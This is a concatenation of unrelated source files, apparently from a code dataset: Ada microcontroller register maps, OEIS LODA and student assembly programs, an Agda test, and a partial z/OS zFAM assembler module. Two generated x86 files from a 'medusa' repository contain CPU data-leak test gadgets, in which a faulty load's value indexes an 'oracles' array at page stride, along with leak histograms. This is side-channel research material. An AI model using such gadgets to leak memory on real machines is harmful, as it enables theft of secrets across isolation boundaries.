record with Volatile_Full_Access, Object_Size => 8, Bit_Order => System.Low_Order_First; for EVSYS_CHINTENSET_EVSYS_CHANNEL_Register use record OVR at 0 range 0 .. 0; EVD at 0 range 1 .. 1; Reserved_2_7 at 0 range 2 .. 7; end record; -- Channel n Interrupt Flag Status and Clear type EVSYS_CHINTFLAG_EVSYS_CHANNEL_Register is record -- Channel Overrun OVR : Boolean := False; -- Channel Event Detected EVD : Boolean := False; -- unspecified Reserved_2_7 : HAL.UInt6 := 16#0#; end record with Volatile_Full_Access, Object_Size => 8, Bit_Order => System.Low_Order_First; for EVSYS_CHINTFLAG_EVSYS_CHANNEL_Register use record OVR at 0 range 0 .. 0; EVD at 0 range 1 .. 1; Reserved_2_7 at 0 range 2 .. 7; end record; -- Channel n Status type EVSYS_CHSTATUS_EVSYS_CHANNEL_Register is record -- Read-only. Ready User RDYUSR : Boolean; -- Read-only. Busy Channel BUSYCH : Boolean; -- unspecified Reserved_2_7 : HAL.UInt6; end record with Volatile_Full_Access, Object_Size => 8, Bit_Order => System.Low_Order_First; for EVSYS_CHSTATUS_EVSYS_CHANNEL_Register use record RDYUSR at 0 range 0 .. 0; BUSYCH at 0 range 1 .. 1; Reserved_2_7 at 0 range 2 .. 7; end record; type EVSYS_CHANNEL_Cluster is record -- Channel n Control CHANNEL : aliased EVSYS_CHANNEL_EVSYS_CHANNEL_Register; -- Channel n Interrupt Enable Clear CHINTENCLR : aliased EVSYS_CHINTENCLR_EVSYS_CHANNEL_Register; -- Channel n Interrupt Enable Set CHINTENSET : aliased EVSYS_CHINTENSET_EVSYS_CHANNEL_Register; -- Channel n Interrupt Flag Status and Clear CHINTFLAG : aliased EVSYS_CHINTFLAG_EVSYS_CHANNEL_Register; -- Channel n Status CHSTATUS : aliased EVSYS_CHSTATUS_EVSYS_CHANNEL_Register; end record with Size => 64; for EVSYS_CHANNEL_Cluster use record CHANNEL at 16#0# range 0 .. 31; CHINTENCLR at 16#4# range 0 .. 7; CHINTENSET at 16#5# range 0 .. 7; CHINTFLAG at 16#6# range 0 .. 7; CHSTATUS at 16#7# range 0 .. 7; end record; type EVSYS_CHANNEL_Clusters is array (0 .. 31) of EVSYS_CHANNEL_Cluster; subtype EVSYS_USER_CHANNEL_Field is HAL.UInt6; -- User Multiplexer n type EVSYS_USER_Register is record -- Channel Event Selection CHANNEL : EVSYS_USER_CHANNEL_Field := 16#0#; -- unspecified Reserved_6_31 : HAL.UInt26 := 16#0#; end record with Volatile_Full_Access, Object_Size => 32, Bit_Order => System.Low_Order_First; for EVSYS_USER_Register use record CHANNEL at 0 range 0 .. 5; Reserved_6_31 at 0 range 6 .. 31; end record; -- User Multiplexer n type EVSYS_USER_Registers is array (0 .. 66) of EVSYS_USER_Register; ----------------- -- Peripherals -- ----------------- -- Event System Interface type EVSYS_Peripheral is record -- Control CTRLA : aliased EVSYS_CTRLA_Register; -- Software Event SWEVT : aliased EVSYS_SWEVT_Register; -- Priority Control PRICTRL : aliased EVSYS_PRICTRL_Register; -- Channel Pending Interrupt INTPEND : aliased EVSYS_INTPEND_Register; -- Interrupt Status INTSTATUS : aliased EVSYS_INTSTATUS_Register; -- Busy Channels BUSYCH : aliased EVSYS_BUSYCH_Register; -- Ready Users READYUSR : aliased EVSYS_READYUSR_Register; EVSYS_CHANNEL : aliased EVSYS_CHANNEL_Clusters; -- User Multiplexer n USER : aliased EVSYS_USER_Registers; end record with Volatile; for EVSYS_Peripheral use record CTRLA at 16#0# range 0 .. 7; SWEVT at 16#4# range 0 .. 31; PRICTRL at 16#8# range 0 .. 7; INTPEND at 16#10# range 0 .. 15; INTSTATUS at 16#14# range 0 .. 31; BUSYCH at 16#18# range 0 .. 31; READYUSR at 16#1C# range 0 .. 31; EVSYS_CHANNEL at 16#20# range 0 .. 2047; USER at 16#120# range 0 .. 2143; end record; -- Event System Interface EVSYS_Periph : aliased EVSYS_Peripheral with Import, Address => EVSYS_Base; end SAM_SVD.EVSYS;
programs/oeis/112/A112689.asm	neoneye/loda	22	86568	<reponame>neoneye/loda ; A112689: A modified Chebyshev transform of the Jacobsthal numbers. ; 0,1,1,0,1,2,1,1,2,2,2,2,2,3,3,2,3,4,3,3,4,4,4,4,4,5,5,4,5,6,5,5,6,6,6,6,6,7,7,6,7,8,7,7,8,8,8,8,8,9,9,8,9,10,9,9,10,10,10,10,10,11,11,10,11,12,11,11,12,12,12,12,12,13,13,12,13,14,13,13,14,14,14,14,14,15,15,14,15,16,15,15,16,16,16,16,16,17,17,16 mul $0,2 lpb $0 mov $2,$0 trn $0,8 mod $2,6 mov $3,$2 min $3,1 add $1,$3 lpe mov $0,$1
test/Succeed/Issue1550.agda	alhassy/agda	3	984	-- Andreas, 2015-08-27 Allow rewrite rules for symbols defined in other file {-# OPTIONS --rewriting #-} open import Common.Nat open import Common.Equality {-# BUILTIN REWRITE _≡_ #-} x+0 : ∀ x → x + 0 ≡ x x+0 zero = refl x+0 (suc x) rewrite x+0 x = refl {-# REWRITE x+0 #-} -- adding rewrite rule for + is ok x+0+0 : ∀{x} → (x + 0) + 0 ≡ x x+0+0 = refl
previous.applescript	BrianAker/mediaPlugin	0	4716	tell application "iTunes" to play (previous track)
Transynther/x86/_processed/AVXALIGN/_ht_zr_/i7-7700_9_0xca.log_21829_576.asm	ljhsiun2/medusa	9	85568	<reponame>ljhsiun2/medusa .global s_prepare_buffers s_prepare_buffers: push %r12 push %r14 push %r8 push %r9 push %rax push %rcx push %rdi push %rsi lea addresses_WT_ht+0x20b4, %rcx nop nop nop cmp %r14, %r14 mov $0x6162636465666768, %r9 movq %r9, %xmm4 movups %xmm4, (%rcx) xor $8579, %rax lea addresses_normal_ht+0x3f14, %rsi nop nop xor %rax, %rax mov (%rsi), %r8w nop add %r8, %r8 lea addresses_normal_ht+0x32f4, %rsi lea addresses_normal_ht+0x7adc, %rdi nop nop nop cmp $37495, %r8 mov $62, %rcx rep movsw nop sub %rax, %rax lea addresses_A_ht+0x17334, %r14 sub %rdi, %rdi vmovups (%r14), %ymm5 vextracti128 $1, %ymm5, %xmm5 vpextrq $0, %xmm5, %rsi xor $25287, %r8 lea addresses_UC_ht+0x5d99, %rax nop nop nop add %r14, %r14 movb (%rax), %r9b nop nop sub %rax, %rax lea addresses_UC_ht+0x9334, %r14 nop nop sub $25717, %rsi and $0xffffffffffffffc0, %r14 movaps (%r14), %xmm0 vpextrq $0, %xmm0, %rcx add %r14, %r14 lea addresses_UC_ht+0x1cc04, %rsi lea addresses_UC_ht+0x1e704, %rdi clflush (%rsi) nop dec %r12 mov $120, %rcx rep movsw nop nop xor %rax, %rax lea addresses_A_ht+0x11534, %rsi lea addresses_WT_ht+0x11764, %rdi nop nop nop nop add $44195, %r9 mov $71, %rcx rep movsw nop nop nop nop sub $24050, %r8 lea addresses_normal_ht+0x1e8e8, %rsi lea addresses_A_ht+0x12f4, %rdi nop cmp $20934, %r12 mov $21, %rcx rep movsb mfence pop %rsi pop %rdi pop %rcx pop %rax pop %r9 pop %r8 pop %r14 pop %r12 ret .global s_faulty_load s_faulty_load: push %r10 push %r11 push %r15 push %r8 push %r9 push %rax push %rcx // Load lea addresses_normal+0x1f240, %rcx nop nop nop nop nop sub $42335, %r10 mov (%rcx), %r15d nop nop nop nop sub $43400, %r9 // Faulty Load lea addresses_WT+0x14734, %r11 nop xor $59973, %r8 vmovntdqa (%r11), %ymm6 vextracti128 $1, %ymm6, %xmm6 vpextrq $1, %xmm6, %rax lea oracles, %r15 and $0xff, %rax shlq $12, %rax mov (%r15,%rax,1), %rax pop %rcx pop %rax pop %r9 pop %r8 pop %r15 pop %r11 pop %r10 ret /* <gen_faulty_load> [REF] {'src': {'congruent': 0, 'AVXalign': False, 'same': False, 'size': 8, 'NT': True, 'type': 'addresses_WT'}, 'OP': 'LOAD'} {'src': {'congruent': 2, 'AVXalign': False, 'same': False, 'size': 4, 'NT': False, 'type': 'addresses_normal'}, 'OP': 'LOAD'} [Faulty Load] {'src': {'congruent': 0, 'AVXalign': False, 'same': True, 'size': 32, 'NT': True, 'type': 'addresses_WT'}, 'OP': 'LOAD'} <gen_prepare_buffer> {'OP': 'STOR', 'dst': {'congruent': 3, 'AVXalign': False, 'same': False, 'size': 16, 'NT': False, 'type': 'addresses_WT_ht'}} {'src': {'congruent': 5, 'AVXalign': False, 'same': True, 'size': 2, 'NT': False, 'type': 'addresses_normal_ht'}, 'OP': 'LOAD'} {'src': {'congruent': 5, 'same': False, 'type': 'addresses_normal_ht'}, 'OP': 'REPM', 'dst': {'congruent': 3, 'same': False, 'type': 'addresses_normal_ht'}} {'src': {'congruent': 9, 'AVXalign': False, 'same': False, 'size': 32, 'NT': False, 'type': 'addresses_A_ht'}, 'OP': 'LOAD'} {'src': {'congruent': 0, 'AVXalign': False, 'same': False, 'size': 1, 'NT': False, 'type': 'addresses_UC_ht'}, 'OP': 'LOAD'} {'src': {'congruent': 8, 'AVXalign': True, 'same': True, 'size': 16, 'NT': False, 'type': 'addresses_UC_ht'}, 'OP': 'LOAD'} {'src': {'congruent': 4, 'same': False, 'type': 'addresses_UC_ht'}, 'OP': 'REPM', 'dst': {'congruent': 3, 'same': True, 'type': 'addresses_UC_ht'}} {'src': {'congruent': 7, 'same': False, 'type': 'addresses_A_ht'}, 'OP': 'REPM', 'dst': {'congruent': 4, 'same': False, 'type': 'addresses_WT_ht'}} {'src': {'congruent': 2, 'same': False, 'type': 'addresses_normal_ht'}, 'OP': 'REPM', 'dst': {'congruent': 3, 'same': False, 'type': 'addresses_A_ht'}} {'44': 385, '45': 198, '00': 21246} 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 45 44 44 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 44 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 45 44 00 44 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 45 44 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 45 44 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 45 44 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 44 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 45 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 44 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 45 44 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 45 44 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 44 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 */
L1/TPs/0204-ASM/tp1/pgm2.asm	Tehcam/Studies	0	25420	<reponame>Tehcam/Studies ; Affiche les valeurs contenues dans les 2 premières cases memoire Load Mem[0] Out Load Mem[1] Out ; Sauvegarde la somme des valeurs dans Mem[2] Add Mem[0] Store Mem[2] Out ; Sauvegarde le produit des valeurs dans Mem[3] Load Mem[0] Mul Mem[1] Store Mem[3] Out ; Fin du programme End
oeis/076/A076740.asm	neoneye/loda-programs	11	312	; A076740: a(0)=0, a(1)=1, a(n)=2*a(n-1)^2-a(n-2)^2. ; Submitted by <NAME> ; 0,1,2,7,94,17623,621131422,771608486480914039,1190759312818733806192492198418844958,2835815482129086304432303489823255992516794878843873643408264712776750007 lpb $0 sub $0,1 pow $2,2 sub $2,$1 add $1,$2 add $1,1 add $2,$1 lpe mov $0,$2
Transynther/x86/_processed/NONE/_xt_sm_/i7-8650U_0xd2_notsx.log_143_1517.asm	ljhsiun2/medusa	9	170868	.global s_prepare_buffers s_prepare_buffers: push %r11 push %r14 push %r8 push %rbp push %rbx push %rdx push %rsi lea addresses_WT_ht+0xef14, %r11 nop nop nop cmp $19441, %r8 mov $0x6162636465666768, %rsi movq %rsi, %xmm6 movups %xmm6, (%r11) nop nop nop nop nop cmp %rbx, %rbx lea addresses_normal_ht+0xc6d4, %rbx clflush (%rbx) nop nop nop xor %r14, %r14 mov (%rbx), %r8 nop nop nop nop nop and $4881, %r14 lea addresses_A_ht+0xa894, %rdx nop nop nop nop nop and %rbp, %rbp mov (%rdx), %r11d xor $59364, %rsi lea addresses_D_ht+0x1d324, %r11 nop nop add %rdx, %rdx mov $0x6162636465666768, %rsi movq %rsi, (%r11) nop nop add $25692, %r8 lea addresses_D_ht+0xf094, %r11 nop nop nop nop nop xor $23876, %r8 vmovups (%r11), %ymm2 vextracti128 $1, %ymm2, %xmm2 vpextrq $0, %xmm2, %rbp nop nop nop xor %rdx, %rdx lea addresses_A_ht+0x183ac, %rbp nop nop and $57858, %rsi movb (%rbp), %r8b xor %rbx, %rbx lea addresses_WT_ht+0x3a14, %r11 nop nop nop add %rdx, %rdx mov $0x6162636465666768, %rsi movq %rsi, %xmm3 movups %xmm3, (%r11) nop nop nop nop nop add $12109, %rdx lea addresses_WC_ht+0x1dda6, %r14 nop nop nop add %rsi, %rsi mov $0x6162636465666768, %r8 movq %r8, %xmm2 vmovups %ymm2, (%r14) nop nop sub $34001, %r11 pop %rsi pop %rdx pop %rbx pop %rbp pop %r8 pop %r14 pop %r11 ret .global s_faulty_load s_faulty_load: push %r10 push %r12 push %r8 push %rax push %rcx push %rdi push %rsi // Store lea addresses_A+0x1ec94, %r10 nop nop nop nop nop add $45772, %r8 movw $0x5152, (%r10) nop nop nop and $49946, %rsi // Store lea addresses_D+0xec94, %r8 nop nop nop nop add $3231, %rax movw $0x5152, (%r8) nop nop nop xor $35630, %rdi // Store lea addresses_PSE+0x7a94, %r10 nop xor $25798, %r8 movl $0x51525354, (%r10) nop nop nop add %r8, %r8 // Faulty Load lea addresses_A+0x1ec94, %r10 inc %r12 movb (%r10), %cl lea oracles, %r10 and $0xff, %rcx shlq $12, %rcx mov (%r10,%rcx,1), %rcx pop %rsi pop %rdi pop %rcx pop %rax pop %r8 pop %r12 pop %r10 ret /* <gen_faulty_load> [REF] {'OP': 'LOAD', 'src': {'type': 'addresses_A', 'size': 2, 'AVXalign': False, 'NT': False, 'congruent': 0, 'same': True}} {'OP': 'STOR', 'dst': {'type': 'addresses_A', 'size': 2, 'AVXalign': False, 'NT': False, 'congruent': 0, 'same': True}} {'OP': 'STOR', 'dst': {'type': 'addresses_D', 'size': 2, 'AVXalign': False, 'NT': False, 'congruent': 10, 'same': False}} {'OP': 'STOR', 'dst': {'type': 'addresses_PSE', 'size': 4, 'AVXalign': False, 'NT': False, 'congruent': 8, 'same': False}} [Faulty Load] {'OP': 'LOAD', 'src': {'type': 'addresses_A', 'size': 1, 'AVXalign': False, 'NT': False, 'congruent': 0, 'same': True}} <gen_prepare_buffer> {'OP': 'STOR', 'dst': {'type': 'addresses_WT_ht', 'size': 16, 'AVXalign': False, 'NT': False, 'congruent': 7, 'same': False}} {'OP': 'LOAD', 'src': {'type': 'addresses_normal_ht', 'size': 8, 'AVXalign': False, 'NT': False, 'congruent': 5, 'same': True}} {'OP': 'LOAD', 'src': {'type': 'addresses_A_ht', 'size': 4, 'AVXalign': False, 'NT': False, 'congruent': 5, 'same': False}} {'OP': 'STOR', 'dst': {'type': 'addresses_D_ht', 'size': 8, 'AVXalign': False, 'NT': False, 'congruent': 4, 'same': False}} {'OP': 'LOAD', 'src': {'type': 'addresses_D_ht', 'size': 32, 'AVXalign': False, 'NT': False, 'congruent': 10, 'same': False}} {'OP': 'LOAD', 'src': {'type': 'addresses_A_ht', 'size': 1, 'AVXalign': True, 'NT': False, 'congruent': 3, 'same': False}} {'OP': 'STOR', 'dst': {'type': 'addresses_WT_ht', 'size': 16, 'AVXalign': False, 'NT': False, 'congruent': 5, 'same': False}} {'OP': 'STOR', 'dst': {'type': 'addresses_WC_ht', 'size': 32, 'AVXalign': False, 'NT': False, 'congruent': 0, 'same': False}} {'52': 143} 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 */
src/net-protos.ads	stcarrez/ada-enet	16	13891	<reponame>stcarrez/ada-enet<gh_stars>10-100 ----------------------------------------------------------------------- -- net-protos -- Network protocols -- Copyright (C) 2016, 2017 <NAME> -- Written by <NAME> (<EMAIL>) -- -- Licensed under the Apache License, Version 2.0 (the "License"); -- you may not use this file except in compliance with the License. -- You may obtain a copy of the License at -- -- http://www.apache.org/licenses/LICENSE-2.0 -- -- Unless required by applicable law or agreed to in writing, software -- distributed under the License is distributed on an "AS IS" BASIS, -- WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -- See the License for the specific language governing permissions and -- limitations under the License. ----------------------------------------------------------------------- with Net.Buffers; with Net.Interfaces; package Net.Protos is pragma Preelaborate; ETHERTYPE_ARP : constant Uint16 := 16#0806#; ETHERTYPE_IP : constant Uint16 := 16#0800#; ETHERTYPE_IPv6 : constant Uint16 := 16#86DD#; type Receive_Handler is access not null procedure (Ifnet : in out Net.Interfaces.Ifnet_Type'Class; Packet : in out Net.Buffers.Buffer_Type); end Net.Protos;
Source/ZFAM020.asm	walmartlabs/zFAM	21	17692	<reponame>walmartlabs/zFAM * * PROGRAM: ZFAM020 * AUTHOR: <NAME> and <NAME> * COMMENTS: zFAM - z/OS File Access Manager * * This program is executed as the Query Mode GET/SELECT * service called by the ZFAM001 control program. * * This program will process primary column index requests * only. * *********************************************************************** * Start Dynamic Storage Area * ********************************************************************* DFHEISTG DSECT REGSAVE DS 16F Register Save Area BAS_REG DS F BAS return register RJ_REG DS F BAS return register - RJ_00 RX_REG DS F BAS return register - RX_00 RD_REG DS F BAS return register - RD_00 APPLID DS CL08 CICS Applid SYSID DS CL04 CICS SYSID USERID DS CL08 CICS USERID RA_ADDR DS F Response Array address (base) RA_PTR DS F Response array address (build) RA_LEN DS F Response Array length WS_LEN DS F WEB SEND Array length PA_ADDR DS F Parser Array address PA_LEN DS F Parser Array length FK_ADDR DS F zFAM Key record address FK_LEN DS F zFAM Key record length FF_ADDR DS F zFAM File record address FF_LEN DS F zFAM File record length CI_ADDR DS F zFAM CI record address CI_LEN DS F zFAM CI record length FD_ADDR DS F Container field address FD_LEN DS F Container field length DS 0F W_INDEX DS F Parser array index W_ADDR DS F Beginning data area address W_F_LEN DS CL08 Packed decimal field length W_T_LEN DS CL08 Packed decimal total length W_COUNT DS CL08 Packed decimal field count W_COLUMN DS CL08 Packed decimal field column W_PDWA DS CL08 Packed decimal field column DS 0F C_NAME DS CL16 Field Name (container name) C_LENGTH DS F Field Length (container data) DS 0F W_PRI_ID DS CL01 Primary column ID flag * *********************************************************************** * zFAM090 communication area * * Logging for ZFAM020 exceptional conditions * *********************************************************************** C_LOG DS 0F C_STATUS DS CL03 HTTP Status code C_REASON DS CL02 Reason Code C_USERID DS CL08 UserID C_PROG DS CL08 Service program name C_FILE DS CL08 File name C_FIELD DS CL16 Field name E_LOG EQU -C_LOG Commarea Data length L_LOG DS H Commarea length *********************************************************************** * File resources. * *********************************************************************** WK_FCT DS 0F zFAM Key structure FCT name WK_TRAN DS CL04 zFAM transaction ID WK_DD DS CL04 zFAM KEY DD name * WK_LEN DS H zFAM Key structure length * WF_FCT DS 0F zFAM File structure FCT name WF_TRAN DS CL04 zFAM transaction ID WF_DD DS CL04 zFAM FILE DD name * WF_LEN DS H zFAM File structure length * *********************************************************************** * Primary Index information * ********************************************************************* DS 0F PI_TYPE DS CL01 Actual key type DS 0F PI_COL DS CL04 Actual key column DS 0F PI_LEN DS CL04 Actual key lenth DS 0F PI_NAME DS CL16 Primary key field name ********************************************************************* * FAxxKEY record key. * *********************************************************************** DS 0F WK_KEY DS CL255 zFAM Key record key * *********************************************************************** * FAxxFILE record key. * *********************************************************************** WF_KEY DS 0F zFAM File record key WF_IDN DS CL06 ID Number WF_NC DS CL02 Named Counter WF_SEG DS H Segment number WF_SUFX DS H Suffix number WF_NULL DS F Zeroes (not used) * *********************************************************************** * Spanned Segment number * *********************************************************************** DS 0F SS_SEG DS H Spanned segment number * *********************************************************************** * SELECT options. * * Primary Key attributes must be included for SELECT requests using * * secondary column index. This is necessary as the Primary Key must * * be returned on all SELECT requests. * *********************************************************************** O_TABLE DS 0F O_P_COL DS PL04 Primary Key column number O_P_LEN DS PL04 Primary Key field length O_P_TYPE DS CL01 Primary Key field type DS CL03 Alignment O_P_NAME DS CL16 Primary Key field name * O_FORM DS CL09 Format message * FIXED - delimited by field size * XML - tags using field name * JSON - tags using field name * DELIMITER - field delimiter * Default - FIXED * DS CL03 Alignment * O_DIST DS CL03 Distinct messages returned * YES - Duplicates not returned * NO - Duplicates returned * Default - NO * DS CL01 Alignment * O_MODE DS CL08 Type of SELECT process * ONLINE - Synchronous request * OFFLINE - Asynchronous request * Default - ONLINE * O_SORT DS CL16 Sort order by field name * FieldName - Ascending sort by field * Default - Primary key * O_ROWS DS CL06 Maximum rows returned * 0 - All available rows * 1-999999 - Maximum rows returned * Default - 0 (All available) * DS CL02 Alignment O_WITH DS CL02 Type of Read (WITH) * UR - Uncommitted Read * CR - Committed Read * Default - UR * DS CL02 Alignment E_TABLE EQU -O_TABLE Length of Option table *********************************************************************** * Spanned segment status information * *********************************************************************** DS 0F W_LENGTH DS CL08 Field length (spanned/remaining) W_WIDTH DS F Field width W_FF_A DS F FAxxFILE data address W_LO DS F Column range low W_HI DS F Column range high W_REL_D DS F Relative displacement W_REL_L DS F Relative length W_SEG DS H Current segment number * *********************************************************************** * Trace entry * *********************************************************************** DS 0F W_46_M DS CL08 Trace entry paragraph * *********************************************************************** * Chunked Message Transfer - JSON and XML initial message length. * ********************************************************************* DS 0F M_LENGTH DS F HTTP initial message length ********************************************************************* * RECEIVE Media Type * * The following values override the OPTIONS(FORMAT=) parameter * *********************************************************************** DS 0F R_TYPE DS CL01 HTTP Media type - bit indicator R_PLAIN EQU X'80' text/plain (fixed) R_JSON EQU X'40' text/json R_XML EQU X'20' text/xml R_DELIM EQU X'10' text/delimited DS 0F R_LENGTH DS F HTTP WEB RECEIVE length R_MEDIA DS CL56 HTTP Media type - text from client * *********************************************************************** * End Dynamic Storage Area * *********************************************************************** * *********************************************************************** * Start Parser Array (maximum 256 fields) * *********************************************************************** * PA_DSECT DSECT P_ID DS PL02 Field ID P_SEC DS PL02 Field level security P_COL DS PL04 Field column P_LEN DS PL04 Field length P_TYPE DS CL01 Field type P_WHERE DS CL01 WHERE indicator P_SEG DS H Field record segment P_NAME DS CL16 Field Name E_PA EQU -P_ID PA entry length ********************************************************************** * End Parser Array * *********************************************************************** * *********************************************************************** * Start Response Array buffer * *********************************************************************** RA_DSECT DSECT R_PRI DS CL255 Primary Key R_FIELD DS CL01 Field entry E_RA EQU -R_PRI RA entry length * *********************************************************************** * End Response Array buffer * *********************************************************************** * *********************************************************************** * Start Field Data buffer * *********************************************************************** FD_DSECT DSECT * * *********************************************************************** * End Field Data buffer * *********************************************************************** * *********************************************************************** * zFAM KEY store record buffer * ********************************************************************* COPY ZFAMDKA ********************************************************************* * zFAM FILE store record buffer * *********************************************************************** COPY ZFAMDFA * * * ********************************************************************* ********************************************************************* * Control Section - ZFAM020 * ********************************************************************* ******************************************************************* ZFAM020 DFHEIENT CODEREG=(R2,R3),DATAREG=R11,EIBREG=R12 ZFAM020 AMODE 31 ZFAM020 RMODE 31 B SYSDATE BRANCH AROUND LITERALS DC CL08'ZFAM020 ' DC CL48' -- Query Mode SELECT service ' DC CL08' ' DC CL08'&SYSDATE' DC CL08' ' DC CL08'&SYSTIME' SYSDATE DS 0H ********************************************************************* * Issue GET CONTAINER for Parser Array. * ********************************************************************* SY_0000 DS 0H MVC C_NAME,C_ARRAY Move parser array container MVC C_LENGTH,S_PA_LEN Move parser array length BAS R14,GC_0010 Issue GET CONTAINER ST R9,PA_ADDR Save parser array address MVC PA_LEN,C_LENGTH Move parser array length ********************************************************************* * Issue WEB RECEIVE to obtain Media Type * *********************************************************************** SY_0001 DS 0H EXEC CICS WEB RECEIVE X MEDIATYPE(R_MEDIA) X LENGTH (R_LENGTH) X SET (R1) X NOHANDLE * XC R_TYPE,R_TYPE Clear RECEIVE Media Type OC R_MEDIA,HEX_40 Set upper case CLC R_MEDIA(10),M_PLAIN text/plain requested? BC B'0111',+8 ... no, continue MVI R_TYPE,R_PLAIN ... yes, set text/plain bit CLC R_MEDIA(09),M_JSON text/json requested? BC B'0111',+8 ... no, continue MVI R_TYPE,R_JSON ... yes, set text/json bit CLC R_MEDIA(08),M_XML text/xml requested? BC B'0111',+8 ... no, continue MVI R_TYPE,R_XML ... yes, set text/xml bit CLC R_MEDIA(14),M_DELIM text/delim requested? BC B'0111',+8 ... no, continue MVI R_TYPE,R_DELIM ... yes, set text/delim bit * CLC R_MEDIA(16),A_JSON application/json requested? BC B'0111',+8 ... no, continue MVI R_TYPE,R_JSON ... yes, set text/json bit CLC R_MEDIA(15),A_XML application/xml requested? BC B'0111',+8 ... no, continue MVI R_TYPE,R_XML ... yes, set text/xml bit * *********************************************************************** * Issue GET CONTAINER for OPTIONS table. * *********************************************************************** SY_0010 DS 0H MVC C_NAME,C_OPTION Move OPTIONS table container MVC C_LENGTH,S_OT_LEN Move OPTIONS table length BAS R14,GC_0020 Issue GET CONTAINER * *********************************************************************** * Set RECEIVE Media Type using OPTIONS(FORMAT=xxxx) Parameter * * The OPTIONS and FORMAT parameter is the original means to request * * zQL response array format. Now, both Media Type or OPTIONS/FORMAT * * can be specified with Media Type taking priority. * *********************************************************************** SY_0011 DS 0H OC R_TYPE,R_TYPE Is RECEIVE Media Type zeroes? BC B'0111',SY_0019 ... no, RECEIVE has priority * MVI R_TYPE,R_PLAIN Set FORMAT(FIXED) default CLC O_FORM,S_FIXED FORMAT(FIXED) requested? BC B'0111',+8 ... no, continue MVI R_TYPE,R_PLAIN ... yes, set text/plain bit CLC O_FORM,S_JSON FORMAT(JSON ) requested? BC B'0111',+8 ... no, continue MVI R_TYPE,R_JSON ... yes, set text/json bit CLC O_FORM,S_XML FORMAT(XML ) requested? BC B'0111',+8 ... no, continue MVI R_TYPE,R_XML ... yes, set text/xml bit CLC O_FORM,S_DELIM FORMAT(DELIM) requested? BC B'0111',+8 ... no, continue MVI R_TYPE,R_DELIM ... yes, set text/delim bit * *********************************************************************** * Address Parser Array. * ********************************************************************* SY_0019 DS 0H L R4,PA_LEN Load parser array length L R5,PA_ADDR Load parser array address USING PA_DSECT,R5 ... tell assembler LA R6,E_PA Load parser array entry length 